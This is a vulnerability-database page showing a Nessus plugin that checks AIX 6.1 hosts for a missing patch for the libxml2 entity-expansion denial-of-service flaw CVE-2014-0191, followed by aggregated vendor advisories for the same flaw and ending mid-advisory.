Search...

AIX 6.1 TL 9 : bos.rte.control (U861276)

2014-11-10T00:00:00

ID AIX_U861276.NASL
Type nessus
Reporter This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.
Modified 2014-11-10T00:00:00

Description

The remote host is missing AIX PTF U861276, which is related to the security of the package bos.rte.control.

Libxml2 is vulnerable to a denial of service, caused by the expansion of internal entities within the xmlParserHandlePEReference().

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were extracted
# from AIX Security PTF U861276. The text itself is copyright (C)
# International Business Machines Corp.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(79062);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2014-0191");

  script_name(english:"AIX 6.1 TL 9 : bos.rte.control (U861276)");
  script_summary(english:"Check for PTF U861276");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote AIX host is missing a vendor-supplied security patch."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The remote host is missing AIX PTF U861276, which is related to the
security of the package bos.rte.control.

Libxml2 is vulnerable to a denial of service, caused by the expansion
of internal entities within the xmlParserHandlePEReference()."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Install the appropriate missing security-related fix."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:ibm:aix:6.1");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/07/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/07/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/10");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.");
  script_family(english:"AIX Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/AIX/oslevel", "Host/AIX/version", "Host/AIX/lslpp");

  exit(0);
}



include("audit.inc");
include("global_settings.inc");
include("aix.inc");

if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if ( ! get_kb_item("Host/AIX/version") ) audit(AUDIT_OS_NOT, "AIX");
if ( ! get_kb_item("Host/AIX/lslpp") ) audit(AUDIT_PACKAGE_LIST_MISSING);

flag = 0;

if ( aix_check_patch(ml:"610009", patch:"U861276", package:"bos.rte.control.6.1.9.30") &lt; 0 ) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:aix_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "AIX_U861276.NASL", "bulletinFamily": "scanner", "title": "AIX 6.1 TL 9 : bos.rte.control (U861276)", "description": "The remote host is missing AIX PTF U861276, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "published": "2014-11-10T00:00:00", "modified": "2014-11-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/79062", "reporter": "This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.", "references": ["http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448"], "cvelist": ["CVE-2014-0191"], "type": "nessus", "lastseen": "2021-01-06T09:18:27", "edition": 23, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0191"]}, {"type": "centos", "idList": ["CESA-2015:0749", "CESA-2014:0513"]}, {"type": "fedora", "idList": ["FEDORA:3CDAE222C7", "FEDORA:C864B601FC15", "FEDORA:831F2608779C", "FEDORA:DDB4D6078C27", "FEDORA:A355960879E0"]}, {"type": "ubuntu", "idList": ["USN-2214-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2978-1:D9688", "DEBIAN:DLA-0016-1:08E9F", "DEBIAN:DSA-2978-2:69125", "DEBIAN:8613E99116DFAD11AB50FECC40F571E0:036E2", "DEBIAN:DLA-151-1:ED039", "DEBIAN:DLA-80-1:DE419"]}, {"type": "freebsd", "idList": ["EFDD0EDC-DA3D-11E3-9ECB-2C4138874F7D"]}, {"type": "redhat", "idList": ["RHSA-2015:0749", "RHSA-2014:0513"]}, {"type": "gentoo", "idList": ["GLSA-201409-08"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-16.NASL", "AIX_IV62447.NASL", "MANDRIVA_MDVSA-2014-086.NASL", "ALA_ALAS-2014-341.NASL", "FEDORA_2014-17573.NASL", "AIX_U862099.NASL", "FEDORA_2014-17609.NASL", "SOLARIS11_LIBXML2_20140819.NASL", "REDHAT-RHSA-2015-0749.NASL", "DEBIAN_DSA-2978.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121271", "OPENVAS:1361412562310841826", "OPENVAS:702978", "OPENVAS:1361412562310868768", "OPENVAS:1361412562310702978", "OPENVAS:1361412562310871346", "OPENVAS:1361412562310123148", "OPENVAS:1361412562310882149", "OPENVAS:1361412562310120474", "OPENVAS:1361412562310868769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30700", "SECURITYVULNS:VULN:14630", "SECURITYVULNS:VULN:14631", "SECURITYVULNS:VULN:13754", "SECURITYVULNS:DOC:31491", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14233", "SECURITYVULNS:DOC:32392", "SECURITYVULNS:DOC:32390"]}, {"type": "amazon", "idList": ["ALAS-2014-341"]}, {"type": "aix", "idList": ["LIBXML2_ADVISORY.ASC"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0513", "ELSA-2015-0749", "ELSA-2015-2550"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C06A4B2B66645C13B898B81F53653130"]}, {"type": "archlinux", "idList": ["ASA-201410-12"]}, {"type": "vmware", "idList": ["VMSA-2014-0012"]}, {"type": "apple", "idList": ["APPLE:HT205795"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}], "modified": "2021-01-06T09:18:27", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-06T09:18:27", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were extracted\n# from AIX Security PTF U861276. The text itself is copyright (C)\n# International Business Machines Corp.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79062);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 6.1 TL 9 : bos.rte.control (U861276)\");\n script_summary(english:\"Check for PTF U861276\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing AIX PTF U861276, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate missing security-related fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AIX/oslevel\", \"Host/AIX/version\", \"Host/AIX/lslpp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif ( aix_check_patch(ml:\"610009\", patch:\"U861276\", package:\"bos.rte.control.6.1.9.30\") < 0 ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "AIX Local Security Checks", "pluginID": "79062", "cpe": ["cpe:/o:ibm:aix:6.1"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:01:11", "description": "The xmlParserHandlePEReference function in parser.c in libxml2 before 2.9.2, as used in Web Listener in Oracle HTTP Server in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 and other products, loads external parameter entities regardless of whether entity substitution or validation is enabled, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XML document.", "edition": 3, "cvss3": {}, "published": "2015-01-21T14:59:00", "title": "CVE-2014-0191", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0191"], "modified": "2017-08-29T01:34:00", "cpe": ["cpe:/a:oracle:fusion_middleware:11.1.1.7.0", "cpe:/a:oracle:fusion_middleware:12.1.2.0.0", "cpe:/a:oracle:fusion_middleware:12.1.3.0.0"], "id": "CVE-2014-0191", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0191", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:fusion_middleware:12.1.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:12.1.3.0.0:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:28:11", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0749\n\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-April/033067.html\n\n**Affected packages:**\nlibxml2\nlibxml2-devel\nlibxml2-python\nlibxml2-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0749.html", "edition": 3, "modified": "2015-04-01T03:26:34", "published": "2015-04-01T03:26:34", "href": "http://lists.centos.org/pipermail/centos-announce/2015-April/033067.html", "id": "CESA-2015:0749", "title": "libxml2 security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-20T18:27:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2013-2877"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0513\n\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nAn out-of-bounds read flaw was found in the way libxml2 detected the end of\nan XML file. A remote attacker could provide a specially crafted XML file\nthat, when processed by an application linked against libxml2, could cause\nthe application to crash. (CVE-2013-2877)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-May/032341.html\n\n**Affected packages:**\nlibxml2\nlibxml2-devel\nlibxml2-python\nlibxml2-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0513.html", "edition": 3, "modified": "2014-05-19T13:08:11", "published": "2014-05-19T13:08:11", "href": "http://lists.centos.org/pipermail/centos-announce/2014-May/032341.html", "id": "CESA-2014:0513", "title": "libxml2 security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "MinGW Windows libxml2 XML processing library. ", "modified": "2015-01-02T05:01:30", "published": "2015-01-02T05:01:30", "id": "FEDORA:DDB4D6078C27", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: mingw-libxml2-2.9.2-1.fc21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "MinGW Windows libxml2 XML processing library. ", "modified": "2015-01-02T05:01:49", "published": "2015-01-02T05:01:49", "id": "FEDORA:831F2608779C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mingw-libxml2-2.9.2-1.fc20", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "This library allows to manipulate XML files. It includes support to read, modify and write XML and HTML files. There is DTDs support this includes parsing and validation even with complex DtDs, either at parse time or later once the document has been modified. The output can be a simple SAX stream or and in-memory DOM like representations. In this case one can use the built-in XPath and XPointer implementation to select sub nodes or ranges. A flexible Input/Output mechanism is available, with existing HTTP and FTP modules and combined to an URI library. ", "modified": "2015-04-07T07:30:19", "published": "2015-04-07T07:30:19", "id": "FEDORA:A355960879E0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: libxml2-2.9.1-7.fc21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "This library allows to manipulate XML files. It includes support to read, modify and write XML and HTML files. There is DTDs support this includes parsing and validation even with complex DtDs, either at parse time or later once the document has been modified. The output can be a simple SAX stream or and in-memory DOM like representations. In this case one can use the built-in XPath and XPointer implementation to select sub nodes or ranges. A flexible Input/Output mechanism is available, with existing HTTP and FTP modules and combined to an URI library. ", "modified": "2015-04-11T09:07:39", "published": "2015-04-11T09:07:39", "id": "FEDORA:C864B601FC15", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: libxml2-2.9.1-4.fc20", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3494", "CVE-2014-5033"], "description": "Libraries for KDE 4. ", "modified": "2014-09-27T09:47:46", "published": "2014-09-27T09:47:46", "id": "FEDORA:3CDAE222C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: kdelibs-4.14.1-1.fc20", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Daniel Berrange discovered that libxml2 would incorrectly perform entity \nsubstitution even when requested not to. If a user or automated system were \ntricked into opening a specially crafted document, an attacker could \npossibly cause resource consumption, resulting in a denial of service.", "edition": 5, "modified": "2014-05-15T00:00:00", "published": "2014-05-15T00:00:00", "id": "USN-2214-1", "href": "https://ubuntu.com/security/notices/USN-2214-1", "title": "libxml2 vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze9\nCVE ID : CVE-2014-0191\nDebian Bug : #747309\n\nDaniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\n\n", "edition": 7, "modified": "2014-07-19T15:16:39", "published": "2014-07-19T15:16:39", "id": "DEBIAN:DLA-0016-1:08E9F", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201407/msg00005.html", "title": "[DLA-0016-1] libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2978-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 11, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2014-0191\n\nDaniel P. Berrange discovered a denial of service vulnerability in \nlibxml2 entity substitution.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-07-11T14:30:16", "published": "2014-07-11T14:30:16", "id": "DEBIAN:DSA-2978-1:D9688", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00159.html", "title": "[SECURITY] [DSA 2978-1] libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:22:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze9\nCVE ID : CVE-2014-0191\nDebian Bug : #747309\n\nDaniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\n\n", "edition": 2, "modified": "2014-07-19T14:46:40", "published": "2014-07-19T14:46:40", "id": "DEBIAN:8613E99116DFAD11AB50FECC40F571E0:036E2", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201407/msg00004.html", "title": "libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:28:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze11\nCVE ID : CVE-2014-0191 CVE-2014-3660\nDebian Bug : 768089\n\nIt was discovered that the update released for libxml2 in DSA 2978 fixing\nCVE-2014-0191 was incomplete. This caused libxml2 to still fetch external\nentities regardless of whether entity substitution or validation is\nenabled.\n\nIn addition, this update addresses a regression introduced in DSA 3057 by\nthe patch fixing CVE-2014-3660. This caused libxml2 to not parse an\nentity when it's used first in another entity referenced from an\nattribute value.\n\n", "edition": 7, "modified": "2015-02-07T16:15:24", "published": "2015-02-07T16:15:24", "id": "DEBIAN:DLA-151-1:ED039", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00005.html", "title": "[SECURITY] [DLA 151-1] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-12T00:53:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2978-2 security@debian.org\nhttp://www.debian.org/security/ Alessandro Ghedini\nFebruary 06, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2014-0191 CVE-2014-3660\nDebian Bug : 768089\n\nIt was discovered that the update released for libxml2 in DSA 2978 fixing\nCVE-2014-0191 was incomplete. This caused libxml2 to still fetch external\nentities regardless of whether entity substitution or validation is\nenabled.\n\nIn addition, this update addresses a regression introduced in DSA 3057 by\nthe patch fixing CVE-2014-3660. This caused libxml2 to not parse an\nentity when it's used first in another entity referenced from an\nattribute value.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.8.0+dfsg1-7+wheezy3.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 2.9.1+dfsg1-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2015-02-06T22:41:13", "published": "2015-02-06T22:41:13", "id": "DEBIAN:DSA-2978-2:69125", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00039.html", "title": "[SECURITY] [DSA 2978-2] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:21:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze10\nCVE ID : CVE-2014-0191 CVE-2014-3660\n\nSogeti found a denial of service flaw in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML file that, when processed by an\napplication using libxml2, would lead to excessive CPU consumption\n(denial of service) based on excessive entity substitutions, even if\nentity substitution was disabled, which is the parser default behavior.\n(CVE-2014-3660)\n\nIn addition, this update addresses a misapplied chunk for a patch\nreleased the previous version (#762864).\n", "edition": 9, "modified": "2014-10-29T21:45:26", "published": "2014-10-29T21:45:26", "id": "DEBIAN:DLA-80-1:DE419", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201410/msg00014.html", "title": "[SECURITY] [DLA 80-1] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:28", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "\nStefan Cornelius reports:\n\nIt was discovered that libxml2, a library providing\n\t support to read, modify and write XML files, incorrectly\n\t performs entity substitution in the doctype prolog, even if\n\t the application using libxml2 disabled any entity\n\t substitution. A remote attacker could provide a\n\t specially-crafted XML file that, when processed, would lead\n\t to the exhaustion of CPU and memory resources or file\n\t descriptors.\nThis issue was discovered by Daniel Berrange of Red Hat.\n\n", "edition": 4, "modified": "2015-07-15T00:00:00", "published": "2013-12-03T00:00:00", "id": "EFDD0EDC-DA3D-11E3-9ECB-2C4138874F7D", "href": "https://vuxml.freebsd.org/freebsd/efdd0edc-da3d-11e3-9ecb-2c4138874f7d.html", "title": "libxml2 -- entity substitution DoS", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n", "modified": "2018-04-12T03:33:29", "published": "2015-03-30T04:00:00", "id": "RHSA-2015:0749", "href": "https://access.redhat.com/errata/RHSA-2015:0749", "type": "redhat", "title": "(RHSA-2015:0749) Moderate: libxml2 security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2877", "CVE-2014-0191"], "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nAn out-of-bounds read flaw was found in the way libxml2 detected the end of\nan XML file. A remote attacker could provide a specially crafted XML file\nthat, when processed by an application linked against libxml2, could cause\nthe application to crash. (CVE-2013-2877)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n", "modified": "2018-06-06T20:24:12", "published": "2014-05-19T04:00:00", "id": "RHSA-2014:0513", "href": "https://access.redhat.com/errata/RHSA-2014:0513", "type": "redhat", "title": "(RHSA-2014:0513) Moderate: libxml2 security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "edition": 1, "description": "### Background\n\nlibxml2 is the XML C parser and toolkit developed for the Gnome project.\n\n### Description\n\nA vulnerability in the xmlParserHandlePEReference() function of parser.c, when expanding entity references, can be exploited to consume large amounts of memory and cause a crash or hang. \n\n### Impact\n\nA remote attacker may be able to cause Denial of Service via a specially crafted XML file containing malicious attributes. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll libxml2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/libxml2-2.9.1-r4\"", "modified": "2014-09-19T00:00:00", "published": "2014-09-19T00:00:00", "id": "GLSA-201409-08", "href": "https://security.gentoo.org/glsa/201409-08", "type": "gentoo", "title": "libxml2: Denial of Service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-0191"], "description": "CPU exhaustion on XML parsing.", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:VULN:13754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13754", "title": "libxml2 DoS", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": [], "description": "\r\n\r\nHi,\r\n\r\nIt was discovered that libxml2, a library providing support to read,\r\nmodify and write XML files, incorrectly performs entity substituton in\r\nthe doctype prolog, even if the application using libxml2 disabled any\r\nentity substitution. A remote attacker could provide a\r\nspecially-crafted XML file that, when processed, would lead to the\r\nexhaustion of CPU and memory resources or file descriptors.\r\n\r\nThis issue was discovered by Daniel Berrange of Red Hat.\r\n\r\nUpstream patch:\r\nhttps://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df\r\n\r\nRed Hat bug:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1090976\r\n\r\n-- Stefan Cornelius / Red Hat Security Response 